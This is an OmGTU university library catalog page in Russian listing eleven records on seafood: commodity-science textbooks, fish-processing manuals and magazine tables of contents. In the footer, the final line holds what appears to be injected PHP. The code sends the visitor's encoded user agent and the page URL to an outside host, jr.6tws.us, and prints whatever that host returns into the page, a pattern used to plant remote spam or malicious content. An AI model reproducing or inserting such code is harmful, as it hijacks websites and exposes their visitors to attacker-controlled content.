Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

53 пользователей



 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=МОРЕПРОДУКТЫ")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 11
1. 
Товароведение, экспертиза в таможенном деле [Текст] / А. В. Виноградова [и др.] ; ред. Е. Л. Богданова, 2013. - 389 с.
Ключевые слова 
ТЕОРИЯ ТОВАРОВЕДЕНИЯ -- КЛАССИФИКАЦИЯ ТОВАРА -- КОДИРОВАНИЕ ТОВАРА -- СТАНДАРТИЗАЦИЯ ТОВАРА -- ПОДТВЕРЖДЕНИЕ СООТВЕТСТВИЯ -- ИДЕНТИФИКАЦИЯ ТОВАРА -- ФАЛЬСИФИКАЦИЯ ТОВАРА -- ЭКСПЕРТИЗА ТОВАРОВ -- ЭКСПЕРТИЗА ТАМОЖЕННАЯ -- ДЕЛО ТАМОЖЕННОЕ -- ТОВАРОВЕДЕНИЕ ПРОДОВОЛЬСТВЕННЫХ ТОВАРОВ -- ЭКСПЕРТИЗА ПРОДОВОЛЬСТВЕННЫХ ТОВАРОВ -- ЗЕРНО -- ПЛОДЫ -- ОВОЩИ -- САХАР -- ИЗДЕЛИЯ КОНДИТЕРСКИЕ -- ТОВАРЫ ВКУСОВЫЕ -- ЖИР ПИЩЕВОЙ -- МАСЛО -- МОЛОКО -- МЯСО -- ЯЙЦА -- ЯЙЦЕПРОДУКТЫ -- РЫБА -- МОРЕПРОДУКТЫ -- ТОВАРОВЕДЕНИЕ НЕПРОДОВОЛЬСТВЕННЫХ ТОВАРОВ -- ЭКСПЕРТИЗА НЕПРОДОВОЛЬСТВЕННЫХ ТОВАРОВ -- НЕФТЬ -- НЕФТЕПРОДУКТЫ -- СМОЛЫ СИНТЕТИЧЕСКИЕ -- ПЛАСТМАССА -- ТОВАРЫ ПАРФЮМЕРНО-КОСМЕТИЧЕСКИЕ -- ТОВАРЫ СИЛИКАТНЫЕ -- ДРЕВИСИНА -- ЛЕСОМАТЕРИАЛЫ -- ТОВАРЫ МЕБЕЛЬНЫЕ -- МЕТАЛЛ -- ТОВАРЫ ЮВЕЛИРНЫЕ -- ТОВАРЫ ТЕКСТИЛЬНЫЕ -- ТОВАРЫ ТРИКОТАЖНЫЕ -- ТОВАРЫ ШВЕЙНЫЕ -- ТОВАРЫ КОЖЕВЕННЫЕ -- ТОВАРЫ ПУШНО-МЕХОВЫЕ -- ТОВАРЫ ОВЧИННО-ШУБНЫЕ

Учебное пособие затрагивает вопросы общей теории товароведения: классификации и кодирования, качества товаров, градаций качества; стандартизации и подтверждения соответствия, экспертизы товаров в таможенном деле. В пособии дан краткий обзор основных товарных групп с учетом присутствия на российском рынке значительного количества товаров зарубежного производства, а также требований, предъявляемых к товарам, пересекающим границы Таможенного союз а и находящихся в обращении на единой таможенной территории.

Учебное пособие предназначено для студентов, обучающихся по специальности 036401 «Таможенное дело».

2. 
Русский гриль [Текст], 1995. - 143 с.
Держатели документа (Информация об экземплярах) 
3. 
Питание и общество. - Журнал, 2010г. № 7
Оглавление 
  • Гвардейский разведчик. - с.2
  • Черняев, Александр Николаевич. Поздравляем ветерана / А. Н. Черняев. - с.3
  • Родионова, Н. В ногу со временем. 80 лет Воронежской государственной технологической академии / Н. Родионова, Е. Романюк. - с.4-6
  • Забнев, Сергей. Пуэр / С. Забнев. - с.8
  • Номофилова, Наталья. "Арт-класс" / Н. Номофилова. - с.10-11
  • Кучер, Л. Дипломатический протокол и этикет / Л. Кучер, Л. Шкуратова. - с.18-19
  • Наступает грибная пора - в лес пора!. - с.20-21
  • Рассольник. - с.21
  • Юшкова, А. Кухня Таиланда: специи, фрукты и морепродукты / А. Юшкова. - с.22-23
  • Киреевский, Игорь. Вечера на хуторе близ Диканьки / И. Киреевский. - с.24-25
  • Мидии и рапаны - новая диетическая добавка. - с.26-27
  • Арефьева, Елена. Давайте извлечем урок! / Е. Арефьева. - с.27
  • Арефьева, Анастасия. Изысканно прекрасная ваниль... / А. Арефьева. - с.30
  • Черная смородина. - с.31
4. 
Здоровье. - Журнал, 2007г. № 9
Оглавление 
  • Калейдоскоп новостей. - с.8-19
  • Молостнова, Дарья. Продвинутая косметика / Д. Молостнова, О. Смирнова. - с.22-25
  • Лифшиц, Соня. Из отпуска с чистой совестью / С. Лифшиц. - с.26-27
  • Матвеева, Марина. ЗГТ - заместительная гормональная терапия / М. Матвеева. - с.28-29
  • Уинслет, Кейт Элизабет. "Мне 31 год, и я люблю свой возраст" / К. Э. Уинслет. - с.30-35
  • Водовозов, Алексей. О пользе лишнего веса / А. Водовозов. - с.36-38
  • Смирнова, Ольга. Победа над возрастом / О. Смирнова. - с.40-45
  • Федоров, Алексей. Заряжайся! / А. Федоров. - с.46
  • Светлова, Анна. Питание по генам - секрет долголетия / А. Светлова. - с.48-49
  • Матвеева, Марина. 7 хороших привычек для красивой осанки / М. Матвеева. - с.50-51
  • Луговская, Виктория. Мал золотник / В. Луговская, Е. Габулова. - с.52-54
  • Морепродукты в осенних тонах. - с.56-57
  • Сайфиева, Светлана. Два часа с... Ириной Низиной / С. Сайфиева. - с.58-61
  • Молостнова, Дарья. Как я лечилась пиявками / Д. Молостнова. - с.62-63
  • Капремонт перед беременностью. - с.64-66
  • Богданова, Светлана. Чайная церемония / С. Богданова. - с.68-69
  • Писарева, Ольга. Фитнес для новичка / О. Писарева. - с.70-72
  • Семенов, Андрей. Зри в печень / А. Семенов. - с.74-75
  • Где делать артроскопию?. - с.76-77
  • Сайфиева, Светлана. Сырная история / С. Сайфиева. - с.78-79
  • Горбунова, Елена. На сухом глазу / Е. Горбунова. - с.80-83
  • Агибалова, Инга. Зеркало женщины / И. Агибалова. - с.86
  • Кузнецова, Ирина. Климакс - великий и ужасный / И. Кузнецова. - с.88-89
  • Форум. - с.90-93
  • Пульсон, Клариса. Книжная полка / К. Пульсон. - с.94
Держатели документа (Информация об экземплярах) 
5. 
Товароведение однородных групп продовольственных товаров [Текст] / ред. Л. Г. Елисеева, 2014. - 929 с.
Ключевые слова 
ТОВАРЫ ПРОДОВОЛЬСТВЕННЫЕ -- ТОВАРОВЕДЕНИЕ ПРОДОВОЛЬСТВЕННЫХ ТОВАРОВ -- КАЧЕСТВО ПРОДОВОЛЬСТВЕННЫХ ТОВАРОВ -- БЕЗОПАСНОСТЬ ПРОДОВОЛЬСТВЕННЫХ ТОВАРОВ -- МАРКИРОВКА ТОВАРА -- УПАКОВКА ПРОДОВОЛЬСТВЕННЫХ ТОВАРОВ -- ЗЕРНО -- МУКА -- КРУПА -- ИЗДЕЛИЯ ХЛЕБОБУЛОЧНЫЕ -- ИЗДЕЛИЯ БАРАНОЧНЫЕ -- ИЗДЕЛИЯ СУХАРНЫЕ -- ИЗДЕЛИЯ МАКАРОННЫЕ -- ТОВАРЫ ПЛОДООВОЩНЫЕ -- ПОТЕРИ ПЛОДОВ -- ПОТЕРИ ОВОЩЕЙ -- КОНСЕРВИРОВАНИЕ ПЛОДООВОЩНОЙ ПРОДУКЦИИ -- ЗАМОРАЖИВАНИЕ ОВОЩЕЙ -- ЗАМОРАЖИВАНИЕ ПЛОДОВ -- НАПИТОК АЛКОГОЛЬНЫЙ -- НАПИТОК БЕЗАЛКОГОЛЬНЫЙ -- ЧАЙ -- КОФЕ -- КОНЦЕНТРАТ ПИЩЕВОЙ -- КРАХМАЛ -- САХАР -- МЕД -- ИЗДЕЛИЯ КОНДИТЕРСКИЕ САХАРИСТЫЕ -- ИЗДЕЛИЯ КОНДИТЕРСКИЕ МУЧНЫЕ -- ЖИР ПИЩЕВОЙ -- МАСЛО РАСТИТЕЛЬНОЕ -- МАРГАРИН -- СПРЕД -- МАЙОНЕЗ -- МОЛОКО -- СЛИВКИ -- ПРОДУКТЫ КИСЛОМОЛОЧНЫЕ -- СЫР -- КОНСЕРВЫ МОЛОЧНЫЕ -- МОРОЖЕНОЕ -- МАРКИРОВКА МОЛОЧНОЙ ПРОДУКЦИИ -- ПРОДУКТЫ МОЛОЧНЫЕ - ПИТАНИЕ ДЕТСКОЕ -- МЯСО -- МЯСО ПТИЦЫ -- ИЗДЕЛИЯ КОЛБАСНЫЕ -- ЯЙЦА -- ЯЙЦЕПРОДУКТЫ -- КОНСЕРВЫ МЯСНЫЕ -- РЫБА -- МОРЕПРОДУКТЫ

Учебник подготовлен в соответствии с образовательным стандартом третьего поколения – ФГОС ВПО по направлению подготовки «Товароведение» по базовой дисциплине профессионального цикла «Товароведение однородных групп продовольственных товаров».

В нем рассматриваются основные понятия и задачи товароведения продовольственных товаров, научные принципы систематизации и классификации продовольственных товаров, факторы, влияющие на формирование и сохранение их потребительских свойств. Дана характеристика пищевой ценности и потребительских свойств однородных групп продовольственных товаров, представлены современные принципы их классификации и кодирования, изложены требования к качеству и безопасности, рассмотрены основные дефекты и причины их возникновения, режимы хранения и сроки годности.

Для студентов бакалавриата, обучающихся по направлениям подготовки «Товароведение», «Торговое дело», «Технология продукции и организация общественного питания» и «Экономика».

6. 
Дубцов Г. Г. Товароведение продовольственных товаров [Текст] / Г. Г. Дубцов, 2014. - 333 с.
Ключевые слова 
ТОВАРЫ ПРОДОВОЛЬСТВЕННЫЕ -- ТОВАРОВЕДЕНИЕ ПРОДОВОЛЬСТВЕННЫХ ТОВАРОВ -- КАЧЕСТВО ПРОДОВОЛЬСТВЕННЫХ ТОВАРОВ -- ЦЕННОСТЬ ФИЗИОЛОГИЧЕСКАЯ -- БЕЗОПАСНОСТЬ ПРОДОВОЛЬСТВЕННЫХ ТОВАРОВ -- ЗЕРНО -- МУКА -- КРУПА -- ИЗДЕЛИЯ МАКАРОННЫЕ -- СОЛОД -- ИЗДЕЛИЯ ХЛЕБОБУЛОЧНЫЕ -- КОРНЕПЛОДЫ -- ОВОЩИ -- ПЛОДЫ -- САХАР -- КРАХМАЛ -- МЕД -- ИЗДЕЛИЯ КОНДИТЕРСКИЕ -- ПРОДУКТЫ ВКУСОВЫЕ -- НАПИТОК АЛКОГОЛЬНЫЙ -- ПИВО -- КВАС -- НАПИТОК БЕЗАЛКОГОЛЬНЫЙ -- ЧАЙ -- КОФЕ -- ПРЯНОСТИ -- МОЛОКО -- СЛИВКИ -- КОНСЕРВЫ МОЛОЧНЫЕ -- МОЛОКО СУХОЕ -- ПРОДУКТЫ КИСЛОМОЛОЧНЫЕ -- СЫР -- МАСЛО КОРОВЬЕ -- МЯСО -- ИЗДЕЛИЯ КОЛБАСНЫЕ -- МЯСОКОПЧЕНОСТИ -- КОНСЕРВЫ МЯСНЫЕ -- РЫБА -- МОРЕПРОДУКТЫ -- ЯЙЦА -- ЯЙЦЕПРОДУКТЫ -- ЖИР ПИЩЕВОЙ -- МАРГАРИН -- РАЗРЫХЛИТЕЛЬ ТЕСТА -- ДРОЖЖИ -- ВОДА -- УПАКОВКА -- ПОСУДА ОДНОРАЗОВАЯ
Держатели документа (Информация об экземплярах) 
7. 
Голубев В. Н. Обработка рыбы и морепродуктов [Текст] : учеб. для учреждений нач. проф. образования / В. Н. Голубев, Т. Н. Назаренко, Е. И. Цыбулько, 2001. - 185 с.
Держатели документа (Информация об экземплярах) 
8. 
Голубев, Владимир Николаевич. Обработка рыбы и морепродуктов : учебник для начального профессионального образования / В. Н. Голубев, Т. Н. Назаренко, Е. И. Цыбулько, 2001. - 192 с.
Держатели документа (Информация об экземплярах) 
9. 
Молчанова Е. Н. Физиология питания [Текст] / Е. Н. Молчанова, 2014. - 240 с.
Ключевые слова 
ФИЗИОЛОГИЯ ПИТАНИЯ -- ПИЩЕВАРЕНИЕ -- ОБМЕН ЭНЕРГЕТИЧЕСКИЙ -- ЭНЕРГОТРАТЫ ОРГАНИЗМА ЧЕЛОВЕКА -- МИКРОНУТРИЕНТЫ -- МАКРОНУТРИЕНТЫ -- БЕЛКИ - ПИТАНИЕ -- ЖИРЫ - ПИТАНИЕ -- УГЛЕВОДЫ - ПИТАНИЕ -- ВЕЩЕСТВА МИНЕРАЛЬНЫЕ - ПИТАНИЕ -- ВИТАМИНЫ - ПИТАНИЕ -- ВОДА - ПИТАНИЕ -- КОМПОНЕНТЫ ПИЩИ -- ЦЕННОСТЬ ПИЩЕВАЯ -- МОЛОКО - ПИТАНИЕ -- ПРОДУКТЫ МОЛОЧНЫЕ - ПИТАНИЕ -- ЯЙЦА - ПИТАНИЕ -- ЯЙЦЕПРОДУКТЫ - ПИТАНИЕ -- МЯСО - ПИТАНИЕ -- ПТИЦА - ПИТАНИЕ -- ПРОДУКТЫ МЯСНЫЕ - ПИТАНИЕ -- РЫБА - ПИТАНИЕ -- МОРЕПРОДУКТЫ - ПИТАНИЕ -- ЗЕРНО - ПИТАНИЕ -- ОВОЩИ - ПИТАНИЕ -- ФРУКТЫ - ПИТАНИЕ -- ЯГОДЫ - ПИТАНИЕ -- ИЗДЕЛИЯ КОНДИТЕРСКИЕ - ПИТАНИЕ -- ТЕОРИЯ ПИТАНИЯ НАУЧНАЯ -- ПИТАНИЕ НЕТРАДИЦИОННОЕ -- ПИТАНИЕ ДЕТЕЙ -- ПИТАНИЕ ПОДРОСТКОВ -- ПИТАНИЕ ПОЖИЛЫХ ЛЮДЕЙ -- ПИТАНИЕ ЖЕНЩИН БЕРЕМЕННЫХ -- ПИТАНИЕ КОРМЯЩИХ МАТЕРЕЙ

В учебном пособии изложены основы физиологии пищеварения, значение и функции органов пищеварительной системы, энергетического обмена. Рассмотрены биологическая роль и значение в питании макро- и микронутриентов, биологически активных веществ. Проанализированы различные теории питания и даны научные основы дифференциального питания для отдельных групп населения.

Для студентов высших учебных заведений, обучающихся по специальности "Технология продукции и организация общественного питания" и "Продукты питания из растительного сырья".

10. 
Товароведение и экспертиза потребительских товаров [Текст] / В. В. Шевченко [и др.] ; рук. работы В. В. Шевченко, 2014. - 751 с.
Ключевые слова 
ТОВАРОВЕДЕНИЕ ПОТРЕБИТЕЛЬСКИХ ТОВАРОВ -- ЭКСПЕРТИЗА ПОТРЕБИТЕЛЬСКИХ ТОВАРОВ -- ТОВАРОВЕДЕНИЕ - ТЕОРИЯ -- КАЧЕСТВО ПИЩЕВЫХ ПРОДУКТОВ -- КЛАССИФИКАЦИЯ ТОВАРА -- КОДИРОВАНИЕ ТОВАРА -- СОСТАВ ХИМИЧЕСКИЙ ПРОДОВОЛЬСТВЕННЫХ ТОВАРОВ -- ВОДА -- ВЕЩЕСТВА МИНЕРАЛЬНЫЕ -- УГЛЕВОДЫ -- ЛИПИДЫ -- ЖИРЫ -- ЛИПОИДЫ -- ВЕЩЕСТВА АЗОТСОДЕРЖАЩИЕ -- ВИТАМИН -- ФЕРМЕНТ -- КИСЛОТА ОРГАНИЧЕСКАЯ -- КОНСЕРВИРОВАНИЕ ПИЩЕВЫХ ПРОДУКТОВ -- ТАРА -- МАТЕРИАЛ УПАКОВОЧНЫЙ -- МАРКИРОВКА ПИЩЕВОЙ ПРОДУКЦИИ -- ТОВАРЫ ЗЕРНОМУЧНЫЕ -- ЗЕРНО -- КРУПА -- МУКА -- ИЗДЕЛИЯ ХЛЕБОБУЛОЧНЫЕ -- ИЗДЕЛИЯ БАРАНОЧНЫЕ -- ИЗДЕЛИЯ СУХАРНЫЕ -- ИЗДЕЛИЯ МАКАРОННЫЕ -- КОНЦЕНТРАТ ПИЩЕВОЙ -- ПЛОДЫ СВЕЖИЕ -- ЯГОДЫ -- ОРЕХИ -- ОВОЩИ -- ТОВАРЫ ВКУСОВЫЕ -- ПРЯНОСТИ -- ПРИПРАВА -- ЧАЙ -- КОФЕ -- НАПИТОК БЕЗАЛКОГОЛЬНЫЙ -- НАПИТОК СЛАБОАЛКОГОЛЬНЫЙ -- НАПИТОК АЛКОГОЛЬНЫЙ -- ВИНО ВИНОГРАДНОЕ -- БРЕНДИ -- КОНЬЯК -- ИЗДЕЛИЯ ТАБАЧНЫЕ -- КРАХМАЛ -- КРАХМАЛОПРОДУКТЫ -- САХАР -- ЗАМЕНИТЕЛЬ САХАРА -- МЕД -- ТОВАРЫ КОНДИТЕРСКИЕ -- СЛАДОСТИ ВОСТОЧНЫЕ -- ТОВАРОВЕДЕНИЕ МОЛОЧНЫХ ТОВАРОВ -- МОЛОКО -- КОНСЕРВЫ МОЛОЧНЫЕ -- СЫР -- МАСЛО -- МОРОЖЕНОЕ -- ЖИРЫ -- ЖИР ПИЩЕВОЙ -- ТОВАРОВЕДЕНИЕ ПИЩЕВЫХ ЖИРОВ -- МАСЛО РАСТИТЕЛЬНОЕ -- ЖИР ТОПЛЕНЫЙ -- МАРГАРИН -- МАЙОНЕЗ -- ТОВАРОВЕДЕНИЕ МЯСНЫХ ПРОДУКТОВ -- МЯСО -- МЯСО ПТИЦЫ -- КОНСЕРВЫ МЯСНЫЕ -- ПОЛУФАБРИКАТЫ МЯСНЫЕ -- ЯЙЦА -- ЯЙЦЕПРОДУКТЫ -- ТОВАРОВЕДЕНИЕ РЫБНЫХ ПРОДУКТОВ -- РЫБА -- КОНСЕРВЫ РЫБНЫЕ -- ИКРА -- ПОЛУФАБРИКАТЫ РЫБНЫЕ -- МОРЕПРОДУКТЫ
Держатели документа (Информация об экземплярах) 
11. 
Родина, Тамара Григорьевна. Товароведение и экспертиза рыбных товаров и морепродуктов [Текст] : Учебник гриф-УМО / Т. Г. Родина, 2007. - 395 с.
Держатели документа (Информация об экземплярах) 


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 2875 - 24.04.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 0.88 с.16 запросов, 0.63c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;